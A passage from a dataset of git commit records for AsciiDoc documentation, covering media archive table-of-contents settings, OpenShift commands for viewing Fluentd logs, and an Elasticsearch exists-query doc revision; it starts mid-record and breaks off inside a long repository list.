persisted in\ncase the scan is aborted. The _writeBlockSize_ property defines the number of\nmedia files to be processed after the currently collected meta data is\npersisted.\n|============================\n\n=== Archive table of contents\n\nA local archive can be configured to generate a JSON file with a table of\ncontents, i.e. a list with all media it contains and their corresponding meta\ndata files. This file has the same format as used by an _HTTP archive_ to\ndefine its content.\n\nThe options are declared in a sub section named _toc_. They are optional; the\nToC file is generated only if a target file is specified.\n\n.Configuration options for the table of contents\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| file | Defines the location where the table of contents file is to be stored.\nIf this property is missing, no such file is generated.\n| descRemovePrefix | The paths to the single media contained in the archive are\ntypically absolute paths. For some use cases, e.g. if they are to be exposed\nvia an HTTP server, they have to be converted to relative URIs. This property\ndefines the prefix of the paths that must be removed for this purpose. Note\nthat only media are included in the ToC document whose path starts with this\nprefix. If no prefix is specified, the whole paths to media are used.\n| descRemovePathComponents | After the path to a medium description file has\nbeen processed (by removing the prefix and converting it to a URI), it is\npossible to strip off a number of URI path components from the beginning. The\nnumber of components to remove can be specified using this property. The\ndefault value is 0; so no components will be removed.\n| descPathSeparator | The path separator used in paths to media description\nfiles. This is typically the slash on Linux and the backslash on Windows.\n| descUrlEncoding | A flag whether URL encoding should be applied to paths to\nmedia. If the media should be exposed via an HTTP server, this is typically\nneeded.\n| rootPrefix | Here a prefix can be specified which is added to paths to media\nfiles. That way, they can be referenced correctly, even if they are stored in a\nsub folder structure.\n| metaDataPrefix | Analogous to _rootPrefix_, this a prefix added to meta data\nfiles. Such files may be stored in a dedicated folder; with this prefix, the\nfolder can be selected.\n|============================\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ae43db4e4b5b21a88fc10a583a219cf3c40ea934","subject":"Fluentd examples are using etcd pod names","message":"Fluentd examples are using etcd pod names\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/efk-logging-fluentd-log-viewing.adoc","new_file":"modules\/efk-logging-fluentd-log-viewing.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/efk-logging-fluentd.adoc\n\n[id=\"efk-logging-fluentd-log-viewing-{context}\"]\n= Viewing Fluentd logs\n\nHow you view logs depends upon the `LOGGING_FILE_PATH` setting.\n\n* If `LOGGING_FILE_PATH` points to a file, the default, use the *logs* utility, from the project, \nwhere the pod is located, to print out the contents of Fluentd log files:\n+\n----\n$ oc exec <any-fluentd-pod> -- logs <1>\n----\n<1> Specify the name of a Fluentd pod. Note the space before `logs`.\n+\nFor example:\n+\n----\n$ oc exec fluentd-ht42r -n openshift-logging -- logs\n----\n+\nTo view the current setting:\n+\n----\noc -n openshift-logging set env daemonset\/fluentd --list | grep LOGGING_FILE_PATH\n----\n\n* If you are using `LOGGING_FILE_PATH=console`, Fluentd writes logs to stdout\/stderr`. \nYou can retrieve the logs with the `oc logs [-f] <pod_name>` command, where the `-f`\nis optional, from the project where the pod is located.\n+\n----\n$ oc logs -f <any-fluentd-pod> <1>\n----\n<1> Specify the name of a Fluentd pod. Use the `-f` option to follow what is being written into the logs.\n+\nFor example\n+\n----\n$ oc logs -f fluentd-ht42r -n openshift-logging\n----\n+\nThe contents of log files are printed out, starting with the oldest log. \n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/efk-logging-fluentd.adoc\n\n[id=\"efk-logging-fluentd-log-viewing-{context}\"]\n= Viewing Fluentd logs\n\nHow you view logs depends upon the `LOGGING_FILE_PATH` setting.\n\n* If `LOGGING_FILE_PATH` points to a file, the default, use the *logs* utility, from the project, \nwhere the pod is located, to print out the contents of Fluentd log files:\n+\n----\n$ oc exec <pod> -- logs <1>\n----\n<1> Specify the name of the Fluentd pod. Note the space before `logs`.\n+\nFor example:\n+\n----\n$ oc exec etcd-member-ip-30.ec2.internal -n kube-system -- logs\n----\n+\nTo view the current setting:\n+\n----\noc -n openshift-logging set env daemonset\/fluentd --list | grep LOGGING_FILE_PATH\n----\n\n* If you are using `LOGGING_FILE_PATH=console`, Fluentd writes logs to stdout\/stderr`. \nYou can retrieve the logs with the `oc logs [-f] <pod_name>` command, where the `-f`\nis optional, from the project where the pod is located.\n+\n----\n$ oc logs -f <pod> <1>\n----\n<1> Specify the name of the Fluentd pod. Use `-f` option to follow what is being written into the logs.\n+\nFor example\n+\n----\n$ oc logs -f etcd-member-ip-30.ec2.internal -n kube-system\n----\n+\nThe contents of log files are printed out, starting with the oldest log. \n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"58da54e2d07d62c6f48940c8ce0c3a79aaac6990","subject":"Docs change for exists query. (#43092)","message":"Docs change for exists query. (#43092)\n\nNow emphasises the test is for indexed values.\r\nPrevious documentation only mentioned the state of the input JSON doc (null values) but this is only one of several reasons why an indexed value may not exist.\r\n\r\nCloses #24256","repos":"robin13\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/query-dsl\/exists-query.asciidoc","new_file":"docs\/reference\/query-dsl\/exists-query.asciidoc","new_contents":"[[query-dsl-exists-query]]\n=== Exists Query\n\nReturns documents that contain an indexed value for a field.\n\nAn indexed value may not exist for a document's field due to a variety of reasons:\n\n* The field in the source JSON is `null` or `[]`\n* The field has `\"index\" : false` set in the mapping\n* The length of the field value exceeded an `ignore_above` setting in the mapping\n* The field value was malformed and `ignore_malformed` was defined in the mapping\n\n[[exists-query-ex-request]]\n==== Example request\n\n[source,js]\n----\nGET \/_search\n{\n \"query\": {\n \"exists\": {\n \"field\": \"user\"\n }\n }\n}\n----\n\/\/ CONSOLE\n\n[[exists-query-top-level-params]]\n==== Top-level parameters for `exists`\n`field`::\nName of the field you wish to search.\n+\nWhile a field is deemed non-existant if the JSON value is `null` or `[]`, these values will indicate the field does exist:\n+\n* Empty strings, such as `\"\"` or `\"-\"`\n* Arrays containing `null` and another value, such as `[null, \"foo\"]`\n* A custom <<null-value, `null-value`>>, defined in field mapping\n\n[[exists-query-notes]]\n==== Notes\n\n[[find-docs-null-values]]\n===== Find documents missing indexed values\nTo find documents that are missing an indexed value for a field,\nuse the `must_not` <<query-dsl-bool-query, boolean query>> with the `exists`\nquery.\n\nThe following search returns documents that are missing an indexed value for\nthe `user` field.\n\n[source,js]\n----\nGET \/_search\n{\n \"query\": {\n \"bool\": {\n \"must_not\": {\n \"exists\": {\n \"field\": \"user\"\n }\n }\n }\n }\n}\n----\n\/\/ CONSOLE","old_contents":"[[query-dsl-exists-query]]\n=== Exists Query\n\nReturns documents that contain a value other than `null` or `[]` in a provided\nfield.\n\n[[exists-query-ex-request]]\n==== Example request\n\n[source,js]\n----\nGET \/_search\n{\n \"query\": {\n \"exists\": {\n \"field\": \"user\"\n }\n }\n}\n----\n\/\/ CONSOLE\n\n[[exists-query-top-level-params]]\n==== Top-level parameters for `exists`\n`field`::\nName of the field you wish to search.\n+\nTo return a document, this field must exist and contain a value other\nthan `null` or `[]`. These values can include:\n+\n* Empty strings, such as `\"\"` or `\"-\"`\n* Arrays containing `null` and another value, such as `[null, \"foo\"]`\n* A custom <<null-value, `null-value`>>, defined in field mapping\n\n[[exists-query-notes]]\n==== Notes\n\n[[find-docs-null-values]]\n===== Find documents with null values\nTo find documents that contain only `null` values or `[]` in a provided field,\nuse the `must_not` <<query-dsl-bool-query, boolean query>> with the `exists`\nquery.\n\nThe following search returns documents that contain only `null` values or `[]`\nin the `user` field.\n\n[source,js]\n----\nGET \/_search\n{\n \"query\": {\n \"bool\": {\n \"must_not\": {\n \"exists\": {\n \"field\": \"user\"\n }\n }\n }\n }\n}\n----\n\/\/ CONSOLE","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db9921fc03e6ea103e443d18bcbb35dec58c3007","subject":"[DOCS] Add community supported MSI installer to docs","message":"[DOCS] Add community supported MSI installer to docs\n","repos":"Flipkart\/elasticsearch,wayeast\/elasticsearch,shreejay\/elasticsearch,MetSystem\/elasticsearch,elancom\/elasticsearch,nezirus\/elasticsearch,wittyameta\/elasticsearch,KimTaehee\/elasticsearch,kingaj\/elasticsearch,franklanganke\/elasticsearch,hafkensite\/elasticsearch,beiske\/elasticsearch,zkidkid\/elasticsearch,spiegela\/elasticsearch,Asimov4\/elasticsearch,mjason3\/elasticsearch,MaineC\/elasticsearch,yuy168\/elasticsearch,strapdata\/elassandra5-rc,jpountz\/elasticsearch,snikch\/elasticsearch,springning\/elasticsearch,djschny\/elasticsearch,achow\/elasticsearch,btiernay\/elasticsearch,Siddartha07\/elasticsearch,strapdata\/elassandra-test,dantuffery\/elasticsearch,ThalaivaStars\/OrgRepo1,vingupta3\/elasticsearch,vingupta3\/elasticsearch,myelin\/elasticsearch,cwurm\/elasticsearch,ThalaivaStars\/OrgRepo1,henakamaMSFT\/elasticsearch,episerver\/elasticsearch,rento19962\/elasticsearch,scorpionvicky\/elasticsearch,lydonchandra\/elasticsearch,truemped\/elasticsearch,fooljohnny\/elasticsearch,markllama\/elasticsearch,LewayneNaidoo\/elasticsearch,Flipkart\/elasticsearch,i-am-Nathan\/elasticsearch,andrejserafim\/elasticsearch,huypx1292\/elasticsearch,sposam\/elasticsearch,JackyMai\/elasticsearch,iamjakob\/elasticsearch,zeroctu\/elasticsearch,hechunwen\/elasticsearch,snikch\/elasticsearch,mjhennig\/elasticsearch,wittyameta\/elasticsearch,sauravmondallive\/elasticsearch,TonyChai24\/ESSource,chirilo\/elasticsearch,chirilo\/elasticsearch,diendt\/elasticsearch,hechunwen\/elasticsearch,sc0ttkclark\/elasticsearch,chrismwendt\/elasticsearch,YosuaMichael\/elasticsearch,sarwarbhuiyan\/elasticsearch,mortonsykes\/elasticsearch,Charlesdong\/elasticsearch,schonfeld\/elasticsearch,janmejay\/elasticsearch,alexbrasetvik\/elasticsearch,ImpressTV\/elasticsearch,nrkkalyan\/elasticsearch,elancom\/elasticsearch,vietlq\/elasticsearch,lmtwga\/elasticsearch,dylan8902\/elasticsearch,pranavraman\/elasticsearch,njlawton\/elasticsearch,iacdingping\/elasticsearch,iacdingping\/elasticsearch,mgalushka\/elasticsearch,apepper\/elasticsearch,wayeast\/elasticsearch,alexshadow007\/elasticsearch,diendt\/elasticsearch,jchampion\/elasticsearch,xingguang2013\/elasticsearch,obourgain\/elasticsearch,kkirsche\/elasticsearch,episerver\/elasticsearch,caengcjd\/elasticsearch,hanswang\/elasticsearch,vingupta3\/elasticsearch,dataduke\/elasticsearch,pablocastro\/elasticsearch,xuzha\/elasticsearch,mapr\/elasticsearch,kubum\/elasticsearch,Ansh90\/elasticsearch,Shekharrajak\/elasticsearch,loconsolutions\/elasticsearch,alexshadow007\/elasticsearch,vvcephei\/elasticsearch,Widen\/elasticsearch,LewayneNaidoo\/elasticsearch,lchennup\/elasticsearch,Chhunlong\/elasticsearch,jprante\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,knight1128\/elasticsearch,MjAbuz\/elasticsearch,sc0ttkclark\/elasticsearch,huypx1292\/elasticsearch,MichaelLiZhou\/elasticsearch,kaneshin\/elasticsearch,LewayneNaidoo\/elasticsearch,jprante\/elasticsearch,mikemccand\/elasticsearch,mmaracic\/elasticsearch,ydsakyclguozi\/elasticsearch,vrkansagara\/elasticsearch,clintongormley\/elasticsearch,SergVro\/elasticsearch,sarwarbhuiyan\/elasticsearch,fernandozhu\/elasticsearch,ThalaivaStars\/OrgRepo1,fooljohnny\/elasticsearch,MjAbuz\/elasticsearch,yongminxia\/elasticsearch,geidies\/elasticsearch,lydonchandra\/elasticsearch,tkssharma\/elasticsearch,springning\/elasticsearch,slavau\/elasticsearch,geidies\/elasticsearch,boliza\/elasticsearch,kunallimaye\/elasticsearch,coding0011\/elasticsearch,jbertouch\/elasticsearch,feiqitian\/elasticsearch,Charlesdong\/elasticsearch,kevinkluge\/elasticsearch,likaiwalkman\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,koxa29\/elasticsearch,rlugojr\/elasticsearch,mute\/elasticsearch,bawse\/elasticsearch,rento19962\/elasticsearch,nrkkalyan\/elasticsearch,Stacey-Gammon\/elasticsearch,18098924759\/elasticsearch,VukDukic\/elasticsearch,queirozfcom\/elasticsearch,wimvds\/elasticsearch,Helen-Zhao\/elasticsearch,clintongormley\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,i-am-Nathan\/elasticsearch,mnylen\/elasticsearch,vietlq\/elasticsearch,apepper\/elasticsearch,onegambler\/elasticsearch,Shekharrajak\/elasticsearch,likaiwalkman\/elasticsearch,diendt\/elasticsearch,franklanganke\/elasticsearch,kenshin233\/elasticsearch,Shepard1212\/elasticsearch,lightslife\/elasticsearch,luiseduardohdbackup\/elasticsearch,khiraiwa\/elasticsearch,fekaputra\/elasticsearch,petabytedata\/elasticsearch,wangtuo\/elasticsearch,polyfractal\/elasticsearch,awislowski\/elasticsearch,kunallimaye\/elasticsearch,mm0\/elasticsearch,apepper\/elasticsearch,fred84\/elasticsearch,kkirsche\/elasticsearch,sjohnr\/elasticsearch,naveenhooda2000\/elasticsearch,feiqitian\/elasticsearch,rmuir\/elasticsearch,hydro2k\/elasticsearch,Siddartha07\/elasticsearch,jpountz\/elasticsearch,AshishThakur\/elasticsearch,Siddartha07\/elasticsearch,andrejserafim\/elasticsearch,mmaracic\/elasticsearch,dongjoon-hyun\/elasticsearch,mgalushka\/elasticsearch,sreeramjayan\/elasticsearch,rento19962\/elasticsearch,achow\/elasticsearch,Liziyao\/elasticsearch,jchampion\/elasticsearch,fooljohnny\/elasticsearch,sposam\/elasticsearch,winstonewert\/elasticsearch,franklanganke\/elasticsearch,jw0201\/elastic,Asimov4\/elasticsearch,markllama\/elasticsearch,huypx1292\/elasticsearch,coding0011\/elasticsearch,djschny\/elasticsearch,henakamaMSFT\/elasticsearch,lchennup\/elasticsearch,himanshuag\/elasticsearch,Collaborne\/elasticsearch,xingguang2013\/elasticsearch,F0lha\/elasticsearch,F0lha\/elasticsearch,feiqitian\/elasticsearch,linglaiyao1314\/elasticsearch,wbowling\/elasticsearch,chirilo\/elasticsearch,mcku\/elasticsearch,vroyer\/elasticassandra,abibell\/elasticsearch,IanvsPoplicola\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,zeroctu\/elasticsearch,scorpionvicky\/elasticsearch,TonyChai24\/ESSource,amit-shar\/elasticsearch,acchen97\/elasticsearch,hydro2k\/elasticsearch,bestwpw\/elasticsearch,vroyer\/elasticassandra,PhaedrusTheGreek\/elasticsearch,LewayneNaidoo\/elasticsearch,kingaj\/elasticsearch,beiske\/elasticsearch,elancom\/elasticsearch,naveenhooda2000\/elasticsearch,Brijeshrpatel9\/elasticsearch,amaliujia\/elasticsearch,peschlowp\/elasticsearch,jimhooker2002\/elasticsearch,peschlowp\/elasticsearch,ulkas\/elasticsearch,rajanm\/elasticsearch,onegambler\/elasticsearch,HonzaKral\/elasticsearch,sjohnr\/elasticsearch,girirajsharma\/elasticsearch,umeshdangat\/elasticsearch,socialrank\/elasticsearch,cwurm\/elasticsearch,strapdata\/elassandra-test,TonyChai24\/ESSource,markllama\/elasticsearch,codebunt\/elasticsearch,cnfire\/elasticsearch-1,Siddartha07\/elasticsearch,brwe\/elasticsearch,onegambler\/elasticsearch,kimimj\/elasticsearch,heng4fun\/elasticsearch,Shekharrajak\/elasticsearch,sscarduzio\/elasticsearch,yuy168\/elasticsearch,jsgao0\/elasticsearch,areek\/elasticsearch,HarishAtGitHub\/elasticsearch,wuranbo\/elasticsearch,lightslife\/elasticsearch,Uiho\/elasticsearch,onegambler\/elasticsearch,ESamir\/elasticsearch,truemped\/elasticsearch,xpandan\/elasticsearch,Microsoft\/elasticsearch,fernandozhu\/elasticsearch,wittyameta\/elasticsearch,bestwpw\/elasticsearch,pablocastro\/elasticsearch,hanswang\/elasticsearch,C-Bish\/elasticsearch,humandb\/elasticsearch,jchampion\/elasticsearch,aglne\/elasticsearch,xuzha\/elasticsearch,zkidkid\/elasticsearch,dantuffery\/elasticsearch,18098924759\/elasticsearch,vietlq\/elasticsearch,springning\/elasticsearch,luiseduardohdbackup\/elasticsearch,kimimj\/elasticsearch,socialrank\/elasticsearch,sc0ttkclark\/elasticsearch,rhoml\/elasticsearch,ydsakyclguozi\/elasticsearch,iantruslove\/elasticsearch,ouyangkongtong\/elasticsearch,weipinghe\/elasticsearch,AndreKR\/elasticsearch,strapdata\/elassandra5-rc,mohit\/elasticsearch,szroland\/elasticsearch,janmejay\/elasticsearch,knight1128\/elasticsearch,Ansh90\/elasticsearch,zkidkid\/elasticsearch,NBSW\/elasticsearch,fforbeck\/elasticsearch,hanst\/elasticsearch,golubev\/elasticsearch,golubev\/elasticsearch,gmarz\/elasticsearch,xingguang2013\/elasticsearch,Flipkart\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,lydonchandra\/elasticsearch,palecur\/elasticsearch,LewayneNaidoo\/elasticsearch,jsgao0\/elasticsearch,nellicus\/elasticsearch,petmit\/elasticsearch,anti-social\/elasticsearch,kimimj\/elasticsearch,polyfractal\/elasticsearch,mjhennig\/elasticsearch,beiske\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,ckclark\/elasticsearch,tkssharma\/elasticsearch,Brijeshrpatel9\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,mgalushka\/elasticsearch,javachengwc\/elasticsearch,markwalkom\/elasticsearch,javachengwc\/elasticsearch,Microsoft\/elasticsearch,heng4fun\/elasticsearch,wbowling\/elasticsearch,ricardocerq\/elasticsearch,andrejserafim\/elasticsearch,sc0ttkclark\/elasticsearch,pranavraman\/elasticsearch,ulkas\/elasticsearch,infusionsoft\/elasticsearch,EasonYi\/elasticsearch,JSCooke\/elasticsearch,Shepard1212\/elasticsearch,Uiho\/elasticsearch,hirdesh2008\/elasticsearch,tebriel\/elasticsearch,ckclark\/elasticsearch,robin13\/elasticsearch,kaneshin\/elasticsearch,gingerwizard\/elasticsearch,masterweb121\/elasticsearch,micpalmia\/elasticsearch,StefanGor\/elasticsearch,lchennup\/elasticsearch,dongjoon-hyun\/elasticsearch,luiseduardohdbackup\/elasticsearch,himanshuag\/elasticsearch,MisterAndersen\/elasticsearch,dongjoon-hyun\/elasticsearch,Brijeshrpatel9\/elasticsearch,ESamir\/elasticsearch,likaiwalkman\/elasticsearch,camilojd\/elasticsearch,truemped\/elasticsearch,weipinghe\/elasticsearch,umeshdangat\/elasticsearch,lmtwga\/elasticsearch,kubum\/elasticsearch,iantruslove\/elasticsearch,clintongormley\/elasticsearch,JackyMai\/elasticsearch,HarishAtGitHub\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,jango2015\/elasticsearch,zeroctu\/elasticsearch,tahaemin\/elasticsearch,chrismwendt\/elasticsearch,mcku\/elasticsearch,dantuffery\/elasticsearch,s1monw\/elasticsearch,queirozfcom\/elasticsearch,JervyShi\/elasticsearch,overcome\/elasticsearch,i-am-Nathan\/elasticsearch,jeteve\/elasticsearch,mkis-\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,yanjunh\/elasticsearch,robin13\/elasticsearch,kimimj\/elasticsearch,adrianbk\/elasticsearch,IanvsPoplicola\/elasticsearch,vvcephei\/elasticsearch,alexbrasetvik\/elasticsearch,AleksKochev\/elasticsearch,maddin2016\/elasticsearch,Widen\/elasticsearch,kingaj\/elasticsearch,jimczi\/elasticsearch,Helen-Zhao\/elasticsearch,slavau\/elasticsearch,GlenRSmith\/elasticsearch,huypx1292\/elasticsearch,sposam\/elasticsearch,kingaj\/elasticsearch,Widen\/elasticsearch,iamjakob\/elasticsearch,spiegela\/elasticsearch,vroyer\/elassandra,springning\/elasticsearch,nazarewk\/elasticsearch,nomoa\/elasticsearch,pozhidaevak\/elasticsearch,Microsoft\/elasticsearch,martinstuga\/elasticsearch,hydro2k\/elasticsearch,jbertouch\/elasticsearch,mcku\/elasticsearch,micpalmia\/elasticsearch,zhiqinghuang\/elasticsearch,ulkas\/elasticsearch,PhaedrusTheGreek\/elasticsearch,jpountz\/elasticsearch,avikurapati\/elasticsearch,yanjunh\/elasticsearch,mjhennig\/elasticsearch,rmuir\/elasticsearch,diendt\/elasticsearch,huanzhong\/elasticsearch,davidvgalbraith\/elasticsearch,masterweb121\/elasticsearch,kaneshin\/elasticsearch,mortonsykes\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,anti-social\/elasticsearch,djschny\/elasticsearch,amaliujia\/elasticsearch,codebunt\/elasticsearch,AshishThakur\/elasticsearch,chrismwendt\/elasticsearch,zeroctu\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,C-Bish\/elasticsearch,wuranbo\/elasticsearch,likaiwalkman\/elasticsearch,AndreKR\/elasticsearch,Charlesdong\/elasticsearch,Collaborne\/elasticsearch,truemped\/elasticsearch,mute\/elasticsearch,brandonkearby\/elasticsearch,mikemccand\/elasticsearch,Shekharrajak\/elasticsearch,jbertouch\/elasticsearch,btiernay\/elasticsearch,golubev\/elasticsearch,snikch\/elasticsearch,jaynblue\/elasticsearch,loconsolutions\/elasticsearch,MichaelLiZhou\/elasticsearch,MaineC\/elasticsearch,EasonYi\/elasticsearch,linglaiyao1314\/elasticsearch,sreeramjayan\/elasticsearch,mohit\/elasticsearch,ulkas\/elasticsearch,EasonYi\/elasticsearch,abibell\/elasticsearch,xingguang2013\/elasticsearch,amit-shar\/elasticsearch,beiske\/elasticsearch,Rygbee\/elasticsearch,andrestc\/elasticsearch,knight1128\/elasticsearch,codebunt\/elasticsearch,humandb\/elasticsearch,wuranbo\/elasticsearch,davidvgalbraith\/elasticsearch,lks21c\/elasticsearch,Ansh90\/elasticsearch,lmtwga\/elasticsearch,andrestc\/elasticsearch,tsohil\/elasticsearch,SergVro\/elasticsearch,huanzhong\/elasticsearch,yuy168\/elasticsearch,kubum\/elasticsearch,thecocce\/elasticsearch,jeteve\/elasticsearch,tkssharma\/elasticsearch,Collaborne\/elasticsearch,palecur\/elasticsearch,ajhalani\/elasticsearch,TonyChai24\/ESSource,maddin2016\/elasticsearch,Helen-Zhao\/elasticsearch,henakamaMSFT\/elasticsearch,sauravmondallive\/elasticsearch,sposam\/elasticsearch,kalimatas\/elasticsearch,linglaiyao1314\/elasticsearch,awislowski\/elasticsearch,MetSystem\/elasticsearch,brandonkearby\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,mkis-\/elasticsearch,sarwarbhuiyan\/elasticsearch,ImpressTV\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,mikemccand\/elasticsearch,caengcjd\/elasticsearch,AshishThakur\/elasticsearch,s1monw\/elasticsearch,slavau\/elasticsearch,mbrukman\/elasticsearch,Widen\/elasticsearch,MetSystem\/elasticsearch,Siddartha07\/elasticsearch,lchennup\/elasticsearch,jpountz\/elasticsearch,alexbrasetvik\/elasticsearch,mm0\/elasticsearch,Clairebi\/ElasticsearchClone,ivansun1010\/elasticsearch,mcku\/elasticsearch,hirdesh2008\/elasticsearch,JervyShi\/elasticsearch,koxa29\/elasticsearch,ESamir\/elasticsearch,sarwarbhuiyan\/elasticsearch,jsgao0\/elasticsearch,fforbeck\/elasticsearch,ydsakyclguozi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rlugojr\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,iacdingping\/elasticsearch,jaynblue\/elasticsearch,opendatasoft\/elasticsearch,opendatasoft\/elasticsearch,milodky\/elasticsearch,18098924759\/elasticsearch,franklanganke\/elasticsearch,kenshin233\/elasticsearch,LeoYao\/elasticsearch,Asimov4\/elasticsearch,fred84\/elasticsearch,zhiqinghuang\/elasticsearch,yanjunh\/elasticsearch,artnowo\/elasticsearch,ricardocerq\/elasticsearch,xpandan\/elasticsearch,sdauletau\/elasticsearch,njlawton\/elasticsearch,vrkansagara\/elasticsearch,tcucchietti\/elasticsearch,apepper\/elasticsearch,elancom\/elasticsearch,gfyoung\/elasticsearch,Collaborne\/elasticsearch,pablocastro\/elasticsearch,queirozfcom\/elasticsearch,adrianbk\/elasticsearch,Fsero\/elasticsearch,i-am-Nathan\/elasticsearch,dylan8902\/elasticsearch,MaineC\/elasticsearch,socialrank\/elasticsearch,rmuir\/elasticsearch,strapdata\/elassandra,mmaracic\/elasticsearch,StefanGor\/elasticsearch,strapdata\/elassandra-test,schonfeld\/elasticsearch,trangvh\/elasticsearch,kunallimaye\/elasticsearch,winstonewert\/elasticsearch,jpountz\/elasticsearch,Kakakakakku\/elasticsearch,elasticdog\/elasticsearch,lzo\/elasticsearch-1,HarishAtGitHub\/elasticsearch,StefanGor\/elasticsearch,nrkkalyan\/elasticsearch,yuy168\/elasticsearch,davidvgalbraith\/elasticsearch,jchampion\/elasticsearch,gingerwizard\/elasticsearch,combinatorist\/elasticsearch,springning\/elasticsearch,i-am-Nathan\/elasticsearch,ckclark\/elasticsearch,queirozfcom\/elasticsearch,himanshuag\/elasticsearch,ydsakyclguozi\/elasticsearch,rhoml\/elasticsearch,YosuaMichael\/elasticsearch,overcome\/elasticsearch,18098924759\/elasticsearch,karthikjaps\/elasticsearch,codebunt\/elasticsearch,snikch\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,Microsoft\/elasticsearch,SergVro\/elasticsearch,gingerwizard\/elasticsearch,jaynblue\/elasticsearch,feiqitian\/elasticsearch,andrestc\/elasticsearch,amaliujia\/elasticsearch,sauravmondallive\/elasticsearch,apepper\/elasticsearch,nilabhsagar\/elasticsearch,mjason3\/elasticsearch,PhaedrusTheGreek\/elasticsearch,socialrank\/elasticsearch,strapdata\/elassandra,caengcjd\/elasticsearch,kalburgimanjunath\/elasticsearch,alexkuk\/elasticsearch,polyfractal\/elasticsearch,kingaj\/elasticsearch,karthikjaps\/elasticsearch,acchen97\/elasticsearch,robin13\/elasticsearch,zhaocloud\/elasticsearch,phani546\/elasticsearch,geidies\/elasticsearch,jbertouch\/elasticsearch,alexkuk\/elasticsearch,hechunwen\/elasticsearch,easonC\/elasticsearch,javachengwc\/elasticsearch,HonzaKral\/elasticsearch,Chhunlong\/elasticsearch,vietlq\/elasticsearch,thecocce\/elasticsearch,masterweb121\/elasticsearch,avikurapati\/elasticsearch,tcucchietti\/elasticsearch,schonfeld\/elasticsearch,fernandozhu\/elasticsearch,wbowling\/elasticsearch,andrestc\/elasticsearch,iantruslove\/elasticsearch,thecocce\/elasticsearch,hafkensite\/elasticsearch,JervyShi\/elasticsearch,tebriel\/elasticsearch,maddin2016\/elasticsearch,kkirsche\/elasticsearch,jimhooker2002\/elasticsearch,LeoYao\/elasticsearch,anti-social\/elasticsearch,jaynblue\/elasticsearch,koxa29\/elasticsearch,acchen97\/elasticsearch,abhijitiitr\/es,markwalkom\/elasticsearch,Flipkart\/elasticsearch,obourgain\/elasticsearch,nilabhsagar\/elasticsearch,umeshdangat\/elasticsearch,Rygbee\/elasticsearch,martinstuga\/elasticsearch,scorpionvicky\/elasticsearch,djschny\/elasticsearch,adrianbk\/elasticsearch,jimhooker2002\/elasticsearch,kcompher\/elasticsearch,Collaborne\/elasticsearch,loconsolutions\/elasticsearch,ricardocerq\/elasticsearch,janmejay\/elasticsearch,sreeramjayan\/elasticsearch,GlenRSmith\/elasticsearch,spiegela\/elasticsearch,gfyoung\/elasticsearch,mbrukman\/elasticsearch,fekaputra\/elasticsearch,jimhooker2002\/elasticsearch,adrianbk\/elasticsearch,cwurm\/elasticsearch,kalburgimanjunath\/elasticsearch,mcku\/elasticsearch,hechunwen\/elasticsearch,drewr\/elasticsearch,kalburgimanjunath\/elasticsearch,mohit\/elasticsearch,masterweb121\/elasticsearch,fooljohnny\/elasticsearch,heng4fun\/elasticsearch,kevinkluge\/elasticsearch,sneivandt\/elasticsearch,iamjakob\/elasticsearch,pozhidaevak\/elasticsearch,Uiho\/elasticsearch,wangyuxue\/elasticsearch,Rygbee\/elasticsearch,weipinghe\/elasticsearch,vingupta3\/elasticsearch,Charlesdong\/elasticsearch,xpandan\/elasticsearch,xuzha\/elasticsearch,ouyangkongtong\/elasticsearch,Stacey-Gammon\/elasticsearch,pablocastro\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mikemccand\/elasticsearch,feiqitian\/elasticsearch,winstonewert\/elasticsearch,KimTaehee\/elasticsearch,a2lin\/elasticsearch,bawse\/elasticsearch,geidies\/elasticsearch,jsgao0\/elasticsearch,aglne\/elasticsearch,lightslife\/el